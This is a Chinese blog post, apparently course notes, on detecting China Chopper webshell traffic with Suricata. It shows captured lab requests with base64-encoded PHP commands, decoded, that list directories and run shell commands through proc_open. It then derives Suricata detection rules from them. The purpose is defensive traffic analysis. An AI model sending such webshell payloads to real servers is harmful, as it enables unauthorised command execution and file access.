流量分析与NIDS系统之Suricata菜刀流量分析

于 2025-03-21 22:05:47 发布
阅读量237 收藏 7
点赞数 5
分类专栏: 流量分析与NIDS系统 安全防御与运营保障 渗透测试与护网蓝队 文章标签: 服务器 安全防御与运营保障 网络安全 流量分析与NIDS
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/YhMjQx/article/details/146430172
版权

文章目录

Suricata菜刀流量分析

教材内容

一、捕获菜刀流量
1、代码上传
POST http://192.168.230.188/security/temp/trojan.php HTTP/1.1
X-Forwarded-For: 2.180.20.22
Referer: http://192.168.230.188/
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)
Host: 192.168.230.188
Content-Length: 672
Pragma: no-cache

a=eval(base64_decode('QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtpZihQSFBfVkVSU0lPTjwnNS4zLjAnKXtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO307ZWNobygiWEBZIik7JEQ9Jy8nOyRGPUBvcGVuZGlyKCREKTtpZigkRj09TlVMTCl7ZWNobygiRVJST1I6Ly8gUGF0aCBOb3QgRm91bmQgT3IgTm8gUGVybWlzc2lvbiEiKTt9ZWxzZXskTT1OVUxMOyRMPU5VTEw7d2hpbGUoJE49QHJlYWRkaXIoJEYpKXskUD0kRC4nLycuJE47JFQ9QGRhdGUoIlktbS1kIEg6aTpzIixAZmlsZW10aW1lKCRQKSk7QCRFPXN1YnN0cihiYXNlX2NvbnZlcnQoQGZpbGVwZXJtcygkUCksMTAsOCksLTQpOyRSPSJcdCIuJFQuIlx0Ii5AZmlsZXNpemUoJFApLiJcdCIuJEUuIlxuIjtpZihAaXNfZGlyKCRQKSkkTS49JE4uIi8iLiRSO2Vsc2UgJEwuPSROLiRSO31lY2hvICRNLiRMO0BjbG9zZWRpcigkRik7fTtlY2hvKCJYQFkiKTtkaWUoKTs%3D'));

base64URL解码之后的内容

%3D 是 =

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D='/';$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.'/'.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."\n";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("X@Y");die();

X@Y./	2023-09-10 17:26:53	224	0555
../	2023-09-10 17:26:53	224	0555
boot/	2024-10-18 09:34:23	4096	0555
dev/	2025-02-17 06:13:03	3120	0755
home/	2025-02-07 15:59:42	21	0755
proc/	2025-02-17 06:12:27	0	0555
run/	2025-02-17 06:13:12	740	0755
sys/	2025-02-17 06:12:43	0	0555
etc/	2025-02-17 06:13:10	8192	0755
root/	2024-08-28 15:50:13	260	0550
var/	2025-02-07 14:26:50	280	0755
tmp/	2025-02-17 07:50:01	4096	1777
usr/	2023-09-10 17:20:08	155	0755
bin/	2025-02-14 17:52:31	24576	0555
sbin/	2025-02-14 17:52:32	16384	0555
lib/	2025-02-14 17:52:31	4096	0555
lib64/	2025-02-14 17:52:31	24576	0555
media/	2018-04-11 06:59:55	6	0755
mnt/	2024-08-28 11:17:29	18	0755
opt/	2025-02-15 10:05:13	4096	0755
srv/	2018-04-11 06:59:55	6	0755
X@Y
2、文件浏览
POST http://192.168.230.188/security/temp/trojan.php HTTP/1.1
X-Forwarded-For: 2.180.20.22
Referer: http://192.168.230.188/
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)
Host: 192.168.230.188
Content-Length: 710
Pragma: no-cache

a=eval(base64_decode('QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtpZihQSFBfVkVSU0lPTjwnNS4zLjAnKXtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO307ZWNobygiWEBZIik7JEQ9Jy9vcHQvbGFtcHAvaHRkb2NzL3NlY3VyaXR5L3RlbXAvJzskRj1Ab3BlbmRpcigkRCk7aWYoJEY9PU5VTEwpe2VjaG8oIkVSUk9SOi8vIFBhdGggTm90IEZvdW5kIE9yIE5vIFBlcm1pc3Npb24hIik7fWVsc2V7JE09TlVMTDskTD1OVUxMO3doaWxlKCROPUByZWFkZGlyKCRGKSl7JFA9JEQuJy8nLiROOyRUPUBkYXRlKCJZLW0tZCBIOmk6cyIsQGZpbGVtdGltZSgkUCkpO0AkRT1zdWJzdHIoYmFzZV9jb252ZXJ0KEBmaWxlcGVybXMoJFApLDEwLDgpLC00KTskUj0iXHQiLiRULiJcdCIuQGZpbGVzaXplKCRQKS4iXHQiLiRFLiJcbiI7aWYoQGlzX2RpcigkUCkpJE0uPSROLiIvIi4kUjtlbHNlICRMLj0kTi4kUjt9ZWNobyAkTS4kTDtAY2xvc2VkaXIoJEYpO307ZWNobygiWEBZIik7ZGllKCk7'));

base64URL解码之后的内容

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D='/opt/lampp/htdocs/security/temp/';$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.'/'.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."\n";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("X@Y");die();

X@Y./	2025-02-17 12:02:09	197	0757
../	2025-02-16 16:17:40	4096	0755
xupt.html	2024-07-09 15:07:37	169	0644
shell.php	2024-08-02 09:03:48	643	0644
trojan.php	2024-07-13 16:06:46	31	0644
muma.php	2024-07-30 09:12:58	202	0644
trojan2.php	2024-07-30 08:43:38	26	0644
trojan3.php	2024-07-30 09:41:00	27	0644
remotefileinc.zip	2024-07-31 09:03:23	205	0644
shell.aspx	2024-08-02 09:03:54	444	0644
cspreport.txt	2024-09-26 03:23:22	658	0646
gif_shell.pHp	2025-02-17 12:02:09	35	0644
X@Y
3、命令执行
POST http://192.168.230.188/security/temp/trojan.php HTTP/1.1
X-Forwarded-For: 2.180.20.22
Referer: http://192.168.230.188/
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)
Host: 192.168.230.188
Content-Length: 728
Pragma: no-cache

a=eval(base64_decode('QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtpZihQSFBfVkVSU0lPTjwnNS4zLjAnKXtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO307ZWNobygiWEBZIik7JG09Z2V0X21hZ2ljX3F1b3Rlc19ncGMoKTskcD0nL2Jpbi9zaCc7JHM9J2NkIC9vcHQvbGFtcHAvaHRkb2NzL3ZhdWRpdC1kZWJ1Zy9zeXMvO2xzO2VjaG8gW1NdO3B3ZDtlY2hvIFtFXSc7JGQ9ZGlybmFtZSgkX1NFUlZFUlsiU0NSSVBUX0ZJTEVOQU1FIl0pOyRjPXN1YnN0cigkZCwwLDEpPT0iLyI%2FIi1jIFwieyRzfVwiIjoiL2MgXCJ7JHN9XCIiOyRyPSJ7JHB9IHskY30iOyRhcnJheT1hcnJheShhcnJheSgicGlwZSIsInIiKSxhcnJheSgicGlwZSIsInciKSxhcnJheSgicGlwZSIsInciKSk7JGZwPXByb2Nfb3Blbigkci4iIDI%2BJjEiLCRhcnJheSwkcGlwZXMpOyRyZXQ9c3RyZWFtX2dldF9jb250ZW50cygkcGlwZXNbMV0pO3Byb2NfY2xvc2UoJGZwKTtwcmludCAkcmV0OztlY2hvKCJYQFkiKTtkaWUoKTs%3D'));

base64URL解码之后的内容

%2F 是 /

%2B 是 +

我们可以发现,QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtpZihQSFBfVkVSU0lPTjwnNS4zLjAnKXtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO307ZWNobygiWEBZIik7 在 base64 代码中出现了多次,同时可以确定,这一段 base64 字符会存在每一个请求中,所以他也会成为我们的判定标准

HTTP/1.1 200 OK
Date: Mon, 17 Feb 2025 11:06:32 GMT
Server: Apache/2.4.38 (Unix) OpenSSL/1.0.2q PHP/5.6.40 mod_perl/2.0.8-dev Perl/v5.16.3
X-Powered-By: PHP/5.6.40
Content-Length: 81
Content-Type: text/html; charset=UTF-8

X@Yconfig.php
install.lock
lib.php
[S]
/opt/lampp/htdocs/vaudit-debug/sys
[E]
X@Y
二、分析特征

菜刀的流量由于没有进行加密,所以各类特征非常明显,以下一些规则均可以将菜刀进行识别

(1)部分菜刀响应里面存在 ->| 作为响应正文的开头,响应的末尾以 |<- 结束;当然我这个菜刀使用 X@Y 作为标识符

(2)请求正文部分至少存在 eval 或 base64_decode 或 可以用于识别

(3)z0参数是一直存在的核心代码,所以z0的Base64解码后的开头的代码:@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);, 所以,Base64编码后也必然是一样的内容。

但是在我这个版本里面,我的菜刀是 @ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");

1、识别响应的开头和结束部分
alert http any any <> $HOME_NET 80 (msg:"菜刀-1"; http.response_body; content: "|2d 3e 7c|"; startswith; content: "|7c 3c 2d|"; endswith; classtype: web-shell-attack; sid: 5618001; rev: 1;)
2、识别非Base64部分
alert http any any -> $HOME_NET 80 (msg:"菜刀-2"; content: "eval"; http_client_body; pcre: "/base64_decode.+POST.+z0=/i"; classtype: web-shell-attack; sid: 5618002; rev: 1;)
3、对Base64进行识别
http_client_body; 要放在 content 参数后面

alert http $EXTERNAL_NET any <> $HOME_NET $HTTP_PORTS (msg:"菜刀-3"; content:"QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtpZihQSFBfVkVSU0lPTjwnNS4zLjAnKXtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO307ZWNobygiWEBZIik7"; http_client_body; classtype:web-shell-attack; sid: 5618003; rev:1;)

image-20250217205541223

# 检测菜刀流量
alert http $EXTERNAL_NET any <> $HOME_NET $HTTP_PORTS (msg:"菜刀-1"; http.response_body; content: "X@Y"; startswith; content: "X@Y"; endswith; classtype: web-shell-attack; sid: 5618001; rev: 1;)
alert http $EXTERNAL_NET any <> $HOME_NET $HTTP_PORTS (msg:"菜刀-2"; content:"QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtpZihQSFBfVkVSU0lPTjwnNS4zLjAnKXtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO307ZWNobygiWEBZIik7"; http_client_body; classtype:web-shell-attack; sid: 5618002; rev:1;)
菜刀webshell流量数据包
08-01
菜刀webshell流量数据包
菜刀流量特征分析】
qq_44122254的博客
08-11 2761
菜刀流量分析
29-5 webshell 流量分析 - 菜刀(1)
2401_84519859的博客
05-16 942
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!内容实在太多,不一一截图了。
29-5 webshell 流量分析 - 菜刀
2401_83974087的博客
04-11 1145
Python编程学习,学习内容包含:语法、正则、文件、 网络、多线程等常用库,推荐《Python核心编程》,不要看完;在实际的渗透测试过程中,面对复杂多变的网络环境,当常用工具不能满足实际需求的时候,往往需要对现有工具进行扩展,或者编写符合我们要求的工具、自动化脚本,这个时候就需要具备一定的编程能力。不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎扫码加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!一些笔者自己买的、其他平台白嫖不到的视频教程。
Shell管理工具流量分析-上(菜刀、蚁剑、冰蝎2.0流量分析)&入侵检测、应急响应资料整理
热门推荐
Love&Share
12-22 1万+
本文将会从攻防的角度分析常用 webshell 管理工具(菜刀、蚁剑、冰蝎2.0,冰蝎3.0、哥斯拉将在下篇介绍)的流量特点,后半部分会整理一些有关 webshell 入侵检测和应急响应的文章
Suricata + Wireshark离线流量日志分析
10-06
Suricata是一款开源的网络入侵检测系统NIDS)和网络入侵预防系统(NIPS)。它能够实时监控网络流量,检测恶意活动,包括病毒、木马、DoS攻击、钓鱼攻击等。Suricata支持多种协议解析,如TCP/IP、HTTP、DNS等,且...
信息安全_流量安全分析.heyi.pptx
08-14
通过建立强大的流量分析系统,可以有效地保护玩家数据,防止业务中断,并对游戏内的异常行为进行风险控制。 总的来说,流量安全分析不仅仅是对网络流量的简单监控,而是涉及到深度解析、威胁检测、资产管理和威胁...
基于Python和Snort的轻量级NIDS系统OWL设计源码
最新发布
02-08
基于Python和Snort的轻量级网络入侵检测系统NIDS)OWL的设计实现,是一项集成了先进网络安全技术的项目。OWL NIDS系统的核心优势在于其轻量级的设计,意味着它可以高效运行,对系统资源的需求相对较低,适合于...
ProbeManager_Suricata:适用于探针管理器的Suricata NIDS模块
05-12
在远程服务器上安装和更新Suricata NIDS。 配置设置并测试配置。 添加,删除,更新脚本和签名。 测试签名的合规性。 测试签名是否通过Pcap生成警报。 通过HTTP或上传文件添加规则。 通过HTTP(EmergingThreat ...
Suricata:高性能网络入侵检测系统的原理应用
12-23
内容概要:本文详细介绍了Suricata,一个高性能的网络入侵检测和预防系统NIDS/NIPS)的原理应用。Suricata由OISF开发和维护,主要用于在高速网络环境中实时分析网络流量,检测潜在的恶意活动和网络入侵。文章...
流量特征分析——蚁剑、菜刀、冰蝎、哥斯拉
Sgirll的博客
07-22 9892
通过对这三种常见的网络攻击工具流量特征的分析,我们可以更好地了解它们在网络流量中的表现。同时,持续的学习和了解新兴攻击工具的流量特征也是保持网络安全的重要一环。哥斯拉的数据包中包含了特定的标记,如"XORHEAD"和"XORBODY",用于标识该数据包是哥斯拉的控制命令。此外,哥斯拉还使用了一种自定义的二进制协议,在通信中传输各种类型的数据。本文将重点研究菜刀、蚁剑和冰蝎这三种常见的网络攻击工具,分析它们在流量中留下的痕迹和特征,以便网络管理员和安全专家能够更好地识别和对抗这些工具所带来的潜在威胁。
有了这个网络安全面试题,面试就像开了挂!(附PDF)
lvaolan的博客
02-26 1445
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!​​​​内容实在太多,不一一截图了。
菜刀,蚁剑,冰蝎,哥斯拉流量特征
2301_76786857的博客
12-24 2905
菜刀,蚁剑,冰蝎,哥斯拉四大webshell工具的流量特征。
菜刀,蚁剑,冰蝎,哥斯拉)流量特征分析总结
weixin_54603520的博客
05-15 5003
在红蓝攻防的过程中,webshell工具的流量特征分析一直时蓝队成员需要关注的重点。
webshell管理工具的流量特征分析(菜刀、蚁剑、冰蝎、哥斯拉)
Bossfrank的博客
05-05 2982
本文介绍了菜刀、蚁剑、冰蝎、哥斯拉四种常见的webshell管理工具的流量特征。从攻防演练和安全岗位面试的角度阐述了这些远控工具的检测方法。
wireshark流量分析
weixin_44414845的博客
11-23 1214
wireshark流量分析一、wireshark捕获过滤器二、显示过滤器三、跟踪TCP流四、导出HTTP对象五、统计模块使用六、HTTP状态码七、菜刀通讯特征1.通过POST方式发送攻击者的控制指令2.菜刀流量的简单分析3.通过回显判断菜刀执行的操作八、提数wireshark数据中的文件1.提取zip文件2.提取 doc文件 一、wireshark捕获过滤器 捕获过滤器就是一个表达式,配置抓包之...
冰蝎、菜刀、蚁剑、哥斯拉流量特征
故事讲予风听
07-18 3324
菜刀,蚁剑,冰蝎,哥斯拉
记录CTF misc之菜刀流量分析
黑面狐
01-22 1万+
一、前言 昨天参加了一场CTF比赛,做了一道菜刀流量分析的题目,因为之前流量分析这块不是很熟悉,加上实战CTF也比较少走了不少弯路。 二、流量分析 菜刀是常见的连接webshell的工具,连接webshell会有明显的GET或POST请求。所以我们只需要找数据包的HTTP请求就行了。 找到第一个HTTP请求,选择追踪HTTP流,进行分析 我们看到webshell就是/upload
webshell使用流量分析(含数据包)
hackzkaq的博客
04-29 4493
零基础学黑客,搜索公众号:白帽子左一 作者:掌控安全学员-逍遥子 一、菜刀 1.使用方法 菜刀的使用简单,将一句话木马上传到目标,然后直接使用菜刀连接即可,菜刀主要可以对目标进行虚拟终端,文件操作,数据库操作等。 2.流量分析 1.当菜刀服务器连接后:最开的的两次流量通信,便产生了大量的数据信息。且使用了base64的方式进行编码 2.对数据解码,发现第一的数据是获取设备的信息,第二段数据是写入了一段新的木马,对第二段的base64编码进行转码整理后得到; @ini_set("displa
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值